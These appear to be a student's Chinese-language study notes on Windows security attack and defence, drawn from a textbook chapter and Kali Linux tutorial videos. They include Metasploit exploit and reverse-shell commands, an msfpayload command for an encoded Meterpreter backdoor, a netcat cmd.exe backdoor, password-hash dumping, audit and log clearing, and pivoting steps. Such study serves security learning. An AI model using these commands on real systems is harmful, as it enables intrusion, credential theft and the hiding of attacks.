第七章Windows操作系统安全攻防总结

1.Windows操作系统的基本结构

分为运行于处理器特权模式的操作系统内核，以及运行在处理器非特权模式的用户空间代码。采用宏内核模式来进行构架，这使得任意的内核模块或设备驱动程序都可能破坏其他内核模块数据，这种宏内核机制也使得Windows操作系统容易遭受以驱动方式植入内核的Rootkit的危害，为了避免这类攻击，最新的Windows7缺省要求所以请求安装进入内核执行的设备驱动程序都需要经过数字签名，这能够有效地提升内核的安全性。同时，由于用户态程序对操作系统内核特权代码和数据没有直接访问的权利，因此Windows内核模块对恶意的用户态程序具备完善的防御能力。

2.Windows操作系统内核的基本模块包括如下

Windows执行体、Windows内核体、设备驱动程序、硬件抽象层、Windows窗口与图形界面接口内核实现代码。

3.Windows操作系统在用户态的代码模块则包括如下

系统支持进程、环境子系统服务进程、服务进程、用户应用软件、核心子系统DLL。

4.Windows操作系统内核中实现了如下的核心机制

Windows进程和线程管理机制、Windows内存管理机制（Windows的虚拟内存空间分为系统核心内存区与用户内存区间两部分，系统核心内存用于映射内核、HAL、Win32k.sys等内核执行模块，并存储内核内存对象，对于内核中运行的特权代码，则可通过DKOM技术来进行枚举和操纵）、Windows文件管理机制（NTFS）、Windows注册表管理机制（注册表中的系统自启动挂接点上注册的应用软件可以随系统引导而自动运行，因此也是很多恶意代码及流氓软件普遍的攻击目标）、Windows的网络机制（从OSI网络参考模型的物理层到应用层，各层上对应的Windows网络组件模块包括如下：①各层网卡硬件的设备驱动程序，处于OSI参考模型的物理层②NDIS库及miniport驱动程序，位于OSI链路层③TDI，对应OSI网络层与传输层④网络APIDLL及TDI客户端，对应OSI会话层与表示层⑤网络应用程序与服务进程，对应OSI应用层）。

5.Windows安全体系结构

Windows操作系统基于引用监控器模型来实现基本的对象安全模型。系统中所有主体对客体的访问都通过引用监控器作为中介，由引用监控器根据安全访问控制策略来进行授权访问，所有访问记录也都由引用监控器生成审计日志。Windows操作系统实现基础的安全机制，其中最核心的是位于内核的SRM安全引用监控器，以及位于用户态的LSASS安全服务，它们与Winlogon/Netlogon及Eventlog等服务一起，实现了对主体用户的身份认证机制，对所有资源对象的访问控制机制，以及对访问的安全审计机制。
Windows身份认证机制：Windows操作系统中以安全主体概念来包含所有进行系统资源访问请求的实体对象，有用户、用户组和计算机三大类，对于每个安全主体，以时间和空间上都全局唯一的SID安全标识符来进行标识。账户权限的根本作用就是限制这些账户内运行程序对系统资源对象的访问。Windows系统中拥有一些内建账户，如拥有最高权限的本地Administrator账户，作为自动运行系统进程环境的SYSTEM/LocalSystem账户，具有相对极少权限的Guest匿名访问用户，以及IUSR_Machinename IIS服务的匿名网络访问账户等。而这些账户在黑客眼中，本地Administrator和SYSTEM账户拥有最高的权限，是他们攻击的终极目标。Windows系统的内建用户组包括：本地最高权限用户组Administrators、具有单一方面系统权限的Account/Backup/Server/Print Operators等操作组、用于容纳服务账户的Network Service与Local Service用户组，以及所有用户账户所在的Users组等。 Windows用户账户的口令字经过加密处理之后被保存于SAM或者活动目录AD中，其中本地用户账户口令信息经过不可逆的128位随机密钥Hash加密后存储在SAM文件中，SAM存储于%systemroot%\system32\config\sam文件系统路径位置，并在注册表的HKEY_LOCAL MACHINE\SAM存有副本。Windows域账户口令信息则保存在域控制器的活动目录AD中，加密方式与单机平台一致，存储文件系统位置是域控制器的%systemroot%\ntds\ntds.dit路径。Windows支持本地身份认证和网络身份认证两种方式，分别对在本地系统登录和远程网络访问的主主体进行合法性验证。网络身份认证过程由LSASS服务的Netlogon模块主导完成。

6.Windows授权与访问控制机制

Windows的授权与访问控制机制是基于引用监控器模型，由内核中的SRM模块与用户态的LSASS服务共同来实施。在Windows服务器操作系统中，用户可以执行内建的whoami命令来查看当前用户的访问令牌信息。Windows对于系统中所有需保护的资源都抽象成对象，具体类型包括文件、目录、注册表键值、内核对象、同步对象、私有对象、管道、内存、通信接口等，而对每个对象会关联一个SD安全描述符，对象安全描述符由如下主要属性组成：Owner SID、Group SID、DACL自主访问控制列表、SACL系统审计访问控制列表。

7.Windows安全审计机制

系统审计策略在本地安全策略中由系统管理员定义，来确定系统对那些事件进行记录。

8.Windows的其他安全机制

身份认证、授权与访问控制以及安全审计是三个基本安全功能。保护Windows系统安全稳定运行最为关键的三项安全措施——防火墙、补丁自动更新以及病毒防护。除安全中心之外，Windows的安全特性还包括IPSec加密与验证机制、EFS加密文件系统、Windows文件保护机制、捆绑的IE浏览器所提供的隐私保护与浏览安全保护机制等。

9.目前Windows远程攻击技术可以分为以下几大类

远程口令猜测与破解攻击、攻击Windows网络服务、攻击Windows客户端及用户。

10.Windows系统的安全漏洞生命周期

系统安全的本质核心在于安全漏洞、渗透攻击及安全检测防御机制之间的攻防博弈与竞赛。所有在安全社区中被公开披露和确认的安全漏洞都将进入到业界知名的CVE、NVD、SecurityFocus、OSVDB等几个通用漏洞信息库中。国内的安全漏洞信息库包括由中国信息安全评测中心维护的中国“国家漏洞库CNNVD”、由国际计算机网络应急技术处理协调中心维护的“国家信息安全漏洞共享平台CNVD”、安全厂商绿盟科技公司维护的绿盟漏洞信息库，以及Sebug网站维护的SSVDB等。针对一个特定的主机系统目标，典型的渗透攻击过程包括漏洞扫描测试、查找针对发现漏洞的渗透代码、实施渗透测试这几个环节。在查找安全漏洞所对应的渗透攻击代码资源时，需要注意的是并非每个已知安全漏洞都能够在互联网上获取到渗透测试者所期望的渗透代码。首先，并非每个已知安全漏洞都存在可用的渗透代码，安全漏洞所在的软件的流行度、漏洞的利用约束条件以及漏洞的危害后果类型等都影响了为该安全漏洞开发渗透攻击代码的价值，另外有些安全漏洞在利用之前就已经被软件厂商所修补，那么也可能导致没人去开发相应的渗透代码，另外一些安全漏洞的利用难度很大，也存在着特定时间里没人有技术能力写出渗透代码的情况，其次，并非所有的渗透代码都是公开的，最后，获取到的渗透代码并非是对所有目标系统环境都适用的。可否达成测试者的预期目标则取决于渗透代码和攻击目标的软件环境是否匹配。

11.使用Metasploit软件实施渗透测试

Metasploit软件采用开发框架和模块组建的可扩展模型，以Ruby语言编写的Metasploit Framework（MSF）库作为整个软件的基础核心，为渗透测试组建的开发与测试提供平台；模块组建是真正实施渗透攻击的代码，包括利用安全漏洞的Exploits模块，进行扫描、查点等其他辅助任务的Auxiliary模块，在目标系统上植入和运行的Shellcode攻击负载Payloads模块，对攻击负载进行编码以躲避检测的Encoders模块，以及对攻击负载进行填充的Nops模块；Metasploit提供多种用户接口，包括Console交互终端、命令行程序运行、Web交互界面以及GUI图形化界面；Metasploit还提供了API接口及插件支持，来支持第三方在MSF基础上开发扩展模块，比如自动化的渗透测试例程等等。

12.使Metasploit Console终端实施渗透测试，只需运行如下命令

①use exploit/windows/dcerpc/ms03_026_dcom,选择针对MS03_026漏洞的渗透攻击模块。②set PAYLOAD generic/shell reverse_tcp，选择该渗透攻击模块适用的攻击负载模块。③set LHOST 192.168.200.2；set RHOST 192.168.200.124,配置该渗透攻击模块和攻击负载模块所必须配置的参数。④exploit，实施渗透攻击过程。⑤在远程控制会话中与目标主机进行交互，可能需要执行“sessions -I”列出当前已建立的远程控制会话，并执行“sessions –i数字”在指定的供给控制会话中与远程目标主机进行交互。

13.远程口令字猜测

Windows通过基于服务器消息块协议承载的文件与打印共享服务来为网络用户提供访问文件系统和打印机的支持，而SMB协议也成为了攻击者实施Windows远程口令字猜测的传统攻击渠道。其他经常遭受远程口令字猜测攻击的Windows网络服务还包括WMI服务、TS远程桌面终端服务、MS SQL数据库服务、SharePoint等使用Windows身份认证Web应用服务。SMB协议通常运行于TCP445端口与TCP139端口。在SMB服务决定授予网络用户对所请求的共享文件或打印机的访问权之前，它会先对用户身份进行验证。攻击者通常使用SMB默认开放的隐藏共享卷作为攻击点，然后攻击者需要目标系统的用户名单作为猜测对象，然后根据提示输入所猜测的Administrator账户的口令，就可以发动攻击了。当然远程口令字猜测成功的前提条件是大量系统中设置了具备弱口令字的用户帐号。目前能够自动执行Windows远程口令字猜测的工具比较流行与常用的工具包括Legion、enum、SMBGrind、NTScan，以及国内较流行的XScan、小榕软件之流光和NTScan汉化版等，这些远程口令猜测工具往往需要配合一个包含“高概率口令”的字典文件来实施攻击，对长度较短的口令也能够进行穷举暴力破解。对于运行于TCP1433和UDP1434端口的MS SQL Server，可以使用sqlbf、Auto-SQL等工具进行口令猜测破解。

14.远程口令字交换通信窃听与破解

第二种实施远程口令字攻击的经典技术是窃听网络上的口令字交换通信实施破解。应对远程口令猜测与破解这种古老但仍然流行的攻击方式，最根本的防御措施仍然是通过安全培训与教育来让网络中每个用户都能够设置较高安全强度的口令。此外，从技术方面，网络系统管理员还可以实施如下措施，从而降低由于网络中用户设置过于简单的口令所带来的安全风险：①尽量关闭不必要开放的易受远程口令猜测攻击网络服务，包括TCP 139/445端口的SMB服务、TCP135端口的WMI服务、TCP3389端口的TS终端服务以及TCP1433端口的MS SQL Server服务等。②配置主机防火墙来限制对上述端口的服务。③利用网络防火墙来限制到这些服务的访问。④应对远程口令字交换通信窃听与破解攻击最基本的途径是禁用过时而且存在本质上安全缺陷的LanMan与NTLM。⑤对于安全级别较高的Windows系统服务器等主机，管理员可以制定和实施强口令字策略，此外可以设置账户锁定阈值，最后还可以在系统上激活帐户登录失败事件审计功能。

15.Windows网络服务远程渗透攻击

Windows操作系统默认开放135（TCP）、137（UDP）、138（UDP）、139（TCP）与445（TCP）端口，对应的网络服务为MSRPC远程调用服务、NetBIOS网络基本输入/输出系统服务和SMB文件与打印共享服务。

16.针对NetBIOS网络服务的著名漏洞及攻击

NetBIOS网络基本输入输出系统提供了Windows局域网联网的基本支持，包括在UDP137端口上监听的NetBIOS名字服务、UDP138端口上的NetBIOS数据报服务以及TCP139端口上的NetBIOS会话服务。

17.针对SMB网络服务的著名漏洞及攻击

服务消息块SMB是Windows操作系统中最为复杂，也最容易遭受远程渗透攻击的网络服务。SMB空会话是Windows网络中影响范围最广和时间最长的安全弱点之一。

18.针对MSRPC网络服务的著名漏洞及攻击

MSRPC网络服务是微软Windows操作系统对DCE-RPC标准远程过程调用机制的实现。远程过程调用机制是现代操作系统最基本的支撑机制之一，允许一个应用程序能够无缝地通过网络调用远程主机上网络进程中的过程，在MSRPC实现中，可以采用如下的网络传输协议：①ncacn_ip_tcp：TCP/IP传输协议，使用TCP135端口②ncadg_ip_udp:UDP/IP传输协议，使用UDP135端口③ncacn_np:SMB命名管道传输协议，使用SMB的TCP139或445端口④ncalrpc:本地网络RPC传输⑤ncacn_http:HTTP传输协议，基于IIS服务，缺省配置在TCP593端口。支持远程过程调用的服务进程启动时，需要注册自己的服务访问点，接口标识符以及服务版本号，一个特殊的RPC服务——Portmapper将维护RPC服务数据库，为网络应用程序调用指定的RPC服务提供访问点、接口与版本的查询功能支持。

19.针对Windows系统上微软网络服务的远程渗透攻击

IIS Internet服务集成了HTTP、FTP、SMTP、POP、NNTP等网络服务，并支持CGI、ASP、ISAPI等动态编程语言与接口，是微软服务器软件提供网站、电子邮件收发和文件共享服务的主要解决方案。MS SQL Server监听TCP1433与UDP1434端口，支持使用Windows用户账号进行身份认证模式。MS SQL Server自建用户身份认证模式，SQL Server数据库服务的登陆账号加密存储与master数据库的syslogins表中，并对用户进行角色管理和授权访问控制，同时提供访问日志功能，整体安全水平能够达到C2级别。

20.网络服务远程渗透攻击防范措施

针对Windows系统上的各种网络服务远程渗透攻击，最基本的防范措施就是尽量避免与消除这些渗透攻击所依赖的服务软件安全漏洞，具体包括如下：①从软件设计开发根源上尽可能减少安全漏洞的出现②作为系统的使用者和管理员，应尽可能快地更新与应用软件安全补丁③在安全漏洞从被意外公布和利用到补丁发布的这段“零日”漏洞时间，管理员对安全敏感的服务器应该测试和实施科永的攻击缓解配置④利用服务软件厂商及社区中提供的安全核对清单来对服务进行安全配置⑤通过漏洞扫描软件来标识网络中存在的以及安全漏洞并及时修补。

21.Windows本地特权提升

从受限用户权限尝试获得特权账户的攻击技术也被称为特权提升，业内简称为“提权”。Windows系统上进行特权提升的共计途径主要是通过DLL注入和破解本地程序安全漏洞。从技术上来说，获得了Administrator权限并不意味着获得了Windows系统的最高权限，Local System账户比Administrator账户的权限更高，比如Administrator不能在系统运行时刻读取SAM位置注册表键值，而Local System却可以。有了Administrator权限，获得Local System权限就很简单了，一种方法是利用Windows的计划任务服务，执行“atXX:XX/INTERACTIVE cmd.exe”打开一个命令Shell，该Shell的权限即为Local System；另一种方法是利用sysinternals的免费工具psexec，它甚至允许以远程方式获得和使用Local System权限。针对本地提权攻击，与网络服务的远程渗透攻击类似，最根本的防范措施就是及时给你的系统打好各种补丁。

22.Windows系统口令字密文提取技术

在本地获取口令字密文的主要包括如下三种途径：①从另一种操作系统启动后拷贝文件系统中的口令密文文件②利用硬盘修复工具包中的rdisk工具，执行“rdisk/s-”命令创建SAM备份文件副本③使用pwdumpX系列工具直接从SAM文件或活动目录中提取口令字密文。

23.LSA Aercrets通常位于HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets子键下，LSA Secrets收录如下信息

①某些服务账户的明文口令字②本季系统最近10位用户的口令字密文③FTP、Web用户的明文口令字④RAS远程访问服务拨号账户的名字和口令字⑤用来访问域控制器的计算机账户和口令字密文。

24.用户敏感数据窃取

对于用户在系统中的文件，攻击者可以执行find、findstr、grep等命令行工具来实施查找，此外，攻击者也可能使用键击记录器来对用户键盘输入进行监听，并期望从中搜索用户登陆某些应用软件、网游、金融网站的口令密码。

25.本地敏感信息窃取防范措施

针对LSA Secrets和其他位置口令字的窃取与破解，目前这种攻击普遍需要攻击者已经具有Administrator的权限，在这种情况下，系统很难防止攻击者获取到这些信息，因此只能通过使用更安全的加密算法保护明文口令字，以及通过安全配置策略避免缓存关键服务器的铭感登陆口令信息，来尽量降低这种攻击造成的安全风险。

26.Windows消踪灭迹

①关闭审计功能（Windows Resource Kit工具包里的auditpol程序可以让他们轻易地关闭审计功能）②清理事件日志（使用Event Viewer事件查看器来打开、读取和清除这台主机上的事件日志）

27.Windows远程控制与后门程序

攻击者往往会在受控的系统中自主植入第三方的远程控制与后门程序，主要分为命令行远程控制工具、图形化远程控制工具这两大类。Netcat工具是攻击者们最常用的命令行远程控制工具么可以通过“nc-L-d-e cmd.exe-p 80”命令启动后门服务，监听所配置的TCP 80端口，并绑定cmd.exe这个Shell程序，当攻击者使用Netcat作为客户端连接目标主机的80端口时，就可以通过网络直接访问到目标主机上的cmd.exe来执行任意的操作。Meterpreter的设计目标包括如下：①隐蔽性②设计功能强大③灵活可扩展。

28.针对后门程序的防范措施

针对远程控制后门程序，在一台计算机已经怀疑遭受攻击的Windows系统上，防御者可以采用一些后门检测软件来尝试发现攻击者隐藏的后门程序，常用的检测软件包括反病毒厂商所提供的杀毒软件，以及一些专业的后门及Rootkit检测软件。

Kali视频第26-30集总结

1.Kali视频第26集漏洞利用之检索与利用总结

Searchsploit
1、工具简介
这个项目是由Offensive Security发起的、基于exploit database官方漏洞数据库源的漏洞搜索工具，可以直接在终端搜索漏洞相关信息，如漏洞简介和漏洞验证/利用脚本。
2、使用方法
在kali终端直接输入“searchsploit -h”可以查看其相关参数用法：
light@kali:~# searchsploit -h
Usage : searchsploit [OPTIONS] term1 [term2] ... [termN]
Example: searchsploit oracle windows local
OPTIONS
-c - Perform case-sensitive searches; by default,
searches will try to be greedy
-v - By setting verbose output, description lines
are allowed to overflow their columns
-h, --help - Show help screen

NOTES:

• Use any number of search terms you would like (minimum: 1)

• Search terms are not case sensitive, and order is irrelevant
  参数解释：
  •-c : 搜索是大小写敏感
  •-v : 详细输出
  
  3、使用示范
  比如我们要搜索windows上iis服务的远程漏洞，可以使用以下命令：
  light@kali:~# searchsploit windows iis remote
  Description Path
  MS Windows IIS 5.0 - 5.1 - Remote Denial of | /windows/dos/35.c
  MS Windows Media Services (nsiislog.dll) Rem | /windows/remote/56.c
  MS Windows IIS SSL Remote Denial of Service | /windows/dos/176.c
  MS IIS 4.0/5.0 and PWS Extended Unicode Dire | /windows/remote/189.c
  MS IIS 4.0/5.0 and PWS Extended Unicode Dire | /windows/remote/190.c
  MS IIS 4.0/5.0 and PWS Extended Unicode Dire | /windows/remote/191.pl
  MS IIS 4.0/5.0 and PWS Extended Unicode Dire | /windows/remote/192.pl
  MS Windows IIS 5.0 SSL Remote buffer overflo | /windows/remote/275.c
  MS Windows IIS 5.0 (500-100.asp) Server Name | /windows/remote/1178.c
  MS Windows IIS SA WebAgent 5.2/5.3 Redirect | /windows/remote/1260.pm
  Microsoft IIS 6.0 (/AUX/.aspx) Remote Denial | /windows/dos/3965.pl
  Microsoft IIS <= 5.1 Hit Highlighting Authen | /windows/remote/4016.sh
  Oracle WebLogic IIS connector JSESSIONID Rem | /windows/remote/8336.pl
  Microsoft IIS 6.0 WebDAV Remote Authenticati | /windows/remote/8704.txt
  Microsoft IIS 6.0 WebDAV Remote Authenticati | /windows/remote/8754.patch
  Microsoft IIS 6.0 WebDAV Remote Authenticati | /windows/remote/8765.php
  Microsoft IIS 6.0 WebDAV Remote Authenticati | /windows/remote/8806.pl
  Microsoft IIS 5.0/6.0 FTP Server Remote Stac | /windows/remote/9541.pl
  Microsoft IIS 5.0 FTP Server Remote Stack Ov | /windows/remote/9559.pl
  Microsoft IIS ASP Multiple Extensions Securi | /windows/remote/10791.py
  Microsoft Internet Information Services (IIS | /windows/remote/14179.txt
  Windows 7 IIS7.5 FTPSVC UNAUTH'D Remote DoS | /windows/dos/15803.py
  Microsoft IIS ISAPI w3who.dll Query String O | /windows/remote/16354.rb
  Microsoft IIS ISAPI nsiislog.dll ISAPI POST | /windows/remote/16355.rb

  2.Kali视频第27集漏洞利用之Metasploit基础总结

  Metasploitable在渗透测试中经常被用到，实际上这套软件包括了很多工具，这些工具组成了一个完整的攻击框架。
  一、启动服务
  在Kali中使用metaaploie，需要先开启PostgreSQL数据库服务和metasploit服务，然后就可以完整的利用msf数据查询exploit和记录。
  service postgresql start service metasploit start
  如果不想每次开机都手工启动服务，可以配置随系统启动。
  update-rc.d postgresql enable
  update-rc.d metasploit enable
  

二、路径介绍
Kali中msf的路径为/usr/metasploit-framework
Auxiliary：辅助模块，
encoders：供msfencode编码工具使用，具体可以使用
msfencode –l
exploits：攻击模块 每个介绍msf的文章都会提到那个ms08_067_netapi，它就在这个目录下。
payloads：其中列出的是攻击载荷，也就是攻击成功后执行的代码。比如我们常设置的windows/meterpreter/reverse_tcp就在这个文件夹下。
post：后渗透阶段块，在获得meterpreter的shell之后可以使用攻击代码。比如常用的hashdump、arp_scanner就在这里。

三、基本命令
msfpayload：用来生成payload或者shellcode

搜索的时候可以用msfpayload -l |grep "windows"这样的命令查询。-o 选项可以列出payload所需的参数。
msfencode：
msf中的编码器，早期为了编码绕过AV，现常用msfpayload与它编码避免exploit中的坏字符串。
msfconsole：开启metasploit的concle
四、测试示例：发现漏洞，搜索exploit

前期扫描得知，目标21端口vsftpd服务版本为2.3.4，使用msfconsole打开msf的命令行版。
找到匹配项
选择相应功能
设置远程ip地址，端口号用21
攻击成功

3.Kali视频第28集漏洞利用之Meterpreter介绍总结

Meterpreter是Metasploit框架中的一个扩展模块，作为溢出成功后的攻击载荷使用，攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个meterpretershell的链接。
Meterpreter作为后渗透模块有多种类型，并且命令由核心命令和扩展库组成，极大地丰富了攻击方式。其有很多有用的功能。
常用命令：
background：将当前会话放置后台
load/use：加载模块
Interact：切换一个信道
migrate：迁移进程
run：执行一个已有模块，输入run后按两下teb，会列出所有的已有脚本。
Resource：执行一个已有的rc脚本常用的Meterpreter类型为：payload/windows/meterpreter/reverse_tcp
针对windows操作系统，反向连接shell，只用起来比较稳定。
一、生成Meterpreter后门
命令：msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.75.132 LPORT=2333 R | msfencode -t exe -c 5 > /root/door1.exe

在指定目录，生成exe文件

生成一个后门就要打开一个监听，接收返回的连接，查看需要的参数。需要两个参数LHOST，LPORT。
将生成的文件模仿入侵的过程移动到靶机里。
set LPORT 2333
set LHOST 192.168.75.132
exploit
background返回到msf里
screenshot桌面截图

4.kali视频第29集Metasploit后渗透测试总结

怎样设置跳板机？
在跳板机获取一定权限后，需要积极地向内网主机权限发展，获取指定的目标信息，探查系统的漏洞，借助Msf已经得到的Meterpreter后门，可以使后续操作更容易。
1、查看当前网卡、网段信息
先控制一台跳板机，查看相关网卡网段信息
2、添加路由表 run autoroute -s 10.0.0.1
3、开Socks代理 通过使用 auxiliaryver/socks4a模块，创建一个Socks代理，可以作为浏览器，Sqlmp，Namp等使用。
4、通过Background和sessions -i可以自由切换进入Session
5、输入run可以看到Meterpreter上可以做的很多命令
6、获取内网信息run arp_scanner -r 10.0.0.1/24
7、也可上传文件，做端口转发后续测试
8、应用程序/权限维持/Tunnel工具集
9、端口转发 upload lcx.exe c:\

5.Kali视频第30集漏洞利用之BeeF总结

对XSS漏洞需要强大框架的支持，如网上的XSS平台。在Kali下，BeeF是一个不逊色于XSS平台的工具。Beef是浏览器攻击框架的简称，是一款专注于浏览器端的渗透测试工具。官网 http://beefproject.com/
1、命令行下启动Beef beef-xss 此时浏览器自动访问此页面：http://127.0.0.1:3000/ui/authentication 使用默认用户名beef与默认密码beef登录：
初始用户名和密码为：beef和beef 左侧为目标的浏览器
2、假设被测试主机由于XSS漏洞请求到 http://192.168.11.152:3000/demos/basic.html
左侧online browsers出现新的选项，其Current Browser中包括浏览器名称、版本、操作系统版本等。
3、HOOK持续的时间为关闭测试页面为止，在此期间，相当于被控制了，可以发送攻击命令，在Commands模块，我们可以完成很多任务：
其中，四种颜色分别表示：
该攻击模块可用，但隐蔽性强
该攻击模块可用，但隐蔽性差
该用户模块是否可用还有待验证
该攻击模块不可用
选取MISC下Raw JavaScript模块作为测试用例
执行，查看返回结果，成功则显示
4、代理Proxy功能
选中目标主机，点右键，在菜单中选中Use as Proxy；然后在Rider选项卡中的Forge Request编辑并发送想要发送的内容。

第七周学习进度

完成了课本第七章的学习，完成了kali视频第26到30集的学习。